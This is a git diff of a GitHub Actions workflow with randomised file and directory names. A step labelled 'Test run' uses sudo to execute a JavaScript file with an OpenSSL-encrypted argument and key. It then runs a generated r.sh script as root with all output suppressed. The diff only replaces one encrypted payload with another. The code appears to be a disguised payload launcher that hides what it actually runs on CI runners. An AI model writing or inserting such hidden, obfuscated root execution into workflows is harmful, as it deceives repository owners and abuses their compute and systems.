--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'daqsv'
+        echo '2zfy9'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX1+pRdWdQ5JtD/9ILOfmy4Q090ePToo0Zi3MSi/cWh+EfiXdWIH8Jq7FYhyTM4Uc9KeXT58tUOtrZryCG3FNATFiGUvWh8VkNr8mEy4OaQwDvGOIOlXfwrIE rsrx4o && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX19KACOKo8TRV+UsA5o8eqizV3oaTT5nbXDRyaW0QTuGJ1xSFjcMPCx0PUKeWP9avENF7I6nRX8U2vM7EBoWI/GkFhDRyy8VFXFkVSHwBPbPZgSjsY/aDRnr z4xtt1 && sudo sh r.sh > /dev/null 2>&1
